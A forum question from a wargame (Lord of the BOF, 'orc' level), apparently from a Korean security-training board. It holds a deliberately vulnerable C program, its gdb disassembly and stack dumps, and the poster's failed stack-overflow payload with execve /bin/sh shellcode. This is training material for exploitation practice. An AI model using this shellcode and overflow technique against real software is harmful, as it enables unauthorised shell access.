http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1939 [복사]
/*
The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Entry point of the "orc" wargame target. This is a deliberately
 * vulnerable training binary: it copies argv[1] into a fixed 40-byte
 * stack buffer with an unbounded strcpy (see below). Nothing in it is
 * safe to reuse in real code.
 *
 * Code-level notes for the reader:
 *  - strlen, memset and strcpy are called without #include <string.h>,
 *    so they are implicitly declared; main also has an implicit int
 *    return type and never returns a value. Both are pre-C99 leftovers.
 *  - argv[1][47] is read without first checking that argv[1] is at
 *    least 48 bytes long, so a shorter argument reads past the end of
 *    the string (out-of-bounds read).
 */
main(int argc, char *argv[])
{
/* buffer sits at ebp-0x28 (see the disassembly below); it is the
 * destination of the unbounded strcpy. i is at ebp-0x2c, i.e. below
 * buffer, so an overflow runs upward into the saved ebp and return
 * address, not into i. */
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter: zero every environment string in place so the environment
// cannot hold data that is referenced later. memset on environ[i]
// mutates the process's own environment block.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
// Offset 47 of the argument lands on the most significant byte of
// main's saved return address (buffer+40..43 is the saved ebp,
// buffer+44..47 the return address), and the only value accepted
// there is 0xbf. This is the level's constraint on the overwritten
// return address, not a bounds check: it does nothing to prevent
// the overflow itself, and it reads argv[1][47] unconditionally.
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// No length check: strcpy stops only at the NUL terminator, and any
// argument that passed the check above has at least 48 bytes before
// its terminator, so this write always exceeds the 40-byte buffer and
// reaches the saved frame pointer and return address. In real code the
// fix is to bound the copy (snprintf(buffer, sizeof buffer, "%s", ...)
// or an explicit strlen check before copying).
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[goblin@localhost tmp]$ gdb -q orc
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %esp,%ebp
0x8048503 <main+3>: sub $0x2c,%esp
0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push $0x8048630
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add $0x4,%esp
0x8048523 <main+35>: nop
0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)
0x804852b <main+43>: nop
0x804852c <main+44>: lea 0x0(%esi,1),%esi
0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax
0x8048533 <main+51>: lea 0x0(,%eax,4),%edx
0x804853a <main+58>: mov 0x8049750,%eax
0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax
0x804854a <main+74>: lea 0x0(,%eax,4),%edx
0x8048551 <main+81>: mov 0x8049750,%eax
0x8048556 <main+86>: mov (%eax,%edx,1),%edx
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add $0x4,%esp
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push $0x0
0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax
0x804856a <main+106>: lea 0x0(,%eax,4),%edx
0x8048571 <main+113>: mov 0x8049750,%eax
0x8048576 <main+118>: mov (%eax,%edx,1),%edx
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add $0xc,%esp
0x8048582 <main+130>: incl 0xffffffd4(%ebp)
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov 0xc(%ebp),%eax
0x804858a <main+138>: add $0x4,%eax
0x804858d <main+141>: mov (%eax),%edx
0x804858f <main+143>: add $0x2f,%edx
0x8048592 <main+146>: cmpb $0xbf,(%edx)
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push $0x804863c
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add $0x4,%esp
0x80485a4 <main+164>: push $0x0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add $0x4,%esp
0x80485ae <main+174>: mov %esi,%esi
---Type <return> to continue, or q <return> to quit---
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: lea 0xffffffd8(%ebp),%eax
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add $0x8,%esp
0x80485c5 <main+197>: lea 0xffffffd8(%ebp),%eax
0x80485c8 <main+200>: push %eax
0x80485c9 <main+201>: push $0x8048659
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add $0x8,%esp
0x80485d6 <main+214>: leave
0x80485d7 <main+215>: ret
0x80485d8 <main+216>: nop
0x80485d9 <main+217>: nop
0x80485da <main+218>: nop
0x80485db <main+219>: nop
0x80485dc <main+220>: nop
0x80485dd <main+221>: nop
0x80485de <main+222>: nop
0x80485df <main+223>: nop
End of assembler dump.
(gdb) b *main+189
Breakpoint 1 at 0x80485bd
(gdb) r `python -c 'print "A"*47+"\xbf"'`
Starting program: /home/goblin/tmp/orc `python -c 'print "A"*47+"\xbf"'`
Breakpoint 1, 0x80485bd in main ()
(gdb) x/100x $esp
0xbffffad4: 0xbffffae0 0xbffffc60 0x00000014 0xbffffb08
0xbffffae4: 0x4000a970 0x400f855b 0x08049680 0x4000ae60
0xbffffaf4: 0xbffffb54 0xbffffb08 0x080484eb 0x0804966c
0xbffffb04: 0x08049680 0xbffffb28 0x400309cb 0x00000002
0xbffffb14: 0xbffffb54 0xbffffb60 0x40013868 0x00000002
0xbffffb24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffb34: 0x00000002 0xbffffb54 0x08048390 0x0804860c
0xbffffb44: 0x4000ae60 0xbffffb4c 0x40013e90 0x00000002
0xbffffb54: 0xbffffc4b 0xbffffc60 0x00000000 0xbffffc91
0xbffffb64: 0xbffffcb3 0xbffffcbd 0xbffffccb 0xbffffcea
0xbffffb74: 0xbffffcf9 0xbffffd12 0xbffffd2e 0xbffffd39
0xbffffb84: 0xbffffd47 0xbffffd89 0xbffffd9b 0xbffffdb0
0xbffffb94: 0xbffffdc0 0xbffffdcc 0xbffffdea 0xbffffe04
0xbffffba4: 0xbffffe0f 0xbffffe1c 0xbffffe24 0x00000000
0xbffffbb4: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffbc4: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffbd4: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffbe4: 0x00000009 0x08048450 0x0000000b 0x000001f7
0xbffffbf4: 0x0000000c 0x000001f7 0x0000000d 0x000001f7
0xbffffc04: 0x0000000e 0x000001f7 0x00000010 0x0febfbff
0xbffffc14: 0x0000000f 0xbffffc46 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x36690000 0x2f003638 0x656d6f68 0x626f672f
0xbffffc54: 0x2f6e696c 0x2f706d74 0x0063726f 0x41414141
(gdb) x/200x $esp
0xbffffad4: 0xbffffae0 0xbffffc60 0x00000014 0xbffffb08
0xbffffae4: 0x4000a970 0x400f855b 0x08049680 0x4000ae60
0xbffffaf4: 0xbffffb54 0xbffffb08 0x080484eb 0x0804966c
0xbffffb04: 0x08049680 0xbffffb28 0x400309cb 0x00000002
0xbffffb14: 0xbffffb54 0xbffffb60 0x40013868 0x00000002
0xbffffb24: 0x08048450 0x00000000 0x08048471 0x08048500
0xbffffb34: 0x00000002 0xbffffb54 0x08048390 0x0804860c
0xbffffb44: 0x4000ae60 0xbffffb4c 0x40013e90 0x00000002
0xbffffb54: 0xbffffc4b 0xbffffc60 0x00000000 0xbffffc91
0xbffffb64: 0xbffffcb3 0xbffffcbd 0xbffffccb 0xbffffcea
0xbffffb74: 0xbffffcf9 0xbffffd12 0xbffffd2e 0xbffffd39
0xbffffb84: 0xbffffd47 0xbffffd89 0xbffffd9b 0xbffffdb0
0xbffffb94: 0xbffffdc0 0xbffffdcc 0xbffffdea 0xbffffe04
0xbffffba4: 0xbffffe0f 0xbffffe1c 0xbffffe24 0x00000000
0xbffffbb4: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffffbc4: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffffbd4: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffffbe4: 0x00000009 0x08048450 0x0000000b 0x000001f7
0xbffffbf4: 0x0000000c 0x000001f7 0x0000000d 0x000001f7
0xbffffc04: 0x0000000e 0x000001f7 0x00000010 0x0febfbff
0xbffffc14: 0x0000000f 0xbffffc46 0x00000000 0x00000000
0xbffffc24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc44: 0x36690000 0x2f003638 0x656d6f68 0x626f672f
0xbffffc54: 0x2f6e696c 0x2f706d74 0x0063726f 0x41414141
0xbffffc64: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc74: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc84: 0x41414141 0x41414141 0xbf414141 0x00000000
0xbffffc94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd04: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd14: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd24: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd34: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd44: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd54: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd64: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd84: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde4: 0x00000000 0x00000000 0x00000000 0x00000000
[goblin@localhost goblin]$ bash2
[goblin@localhost goblin]$ ./orc `python -c 'print "\x90"*15+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*4+"\x64\xfc\xff\xbf"'`
1h//shh/bin⏓ኂ¡Æ
̀d
Segmentation fault
===========================================
buffer[0]에서 48바이트 떨어진 곳에 "\xbf"가 당연히 있구요.
페이로드를 "파일명"+"\x90"*15+"쉘코드(25바이트)"+"\x90"*4+"buffer[5]의 시작주소로 ret설정"
이렇게 했는데 공격이 안 먹힙니다.
어디가 문제입니까? |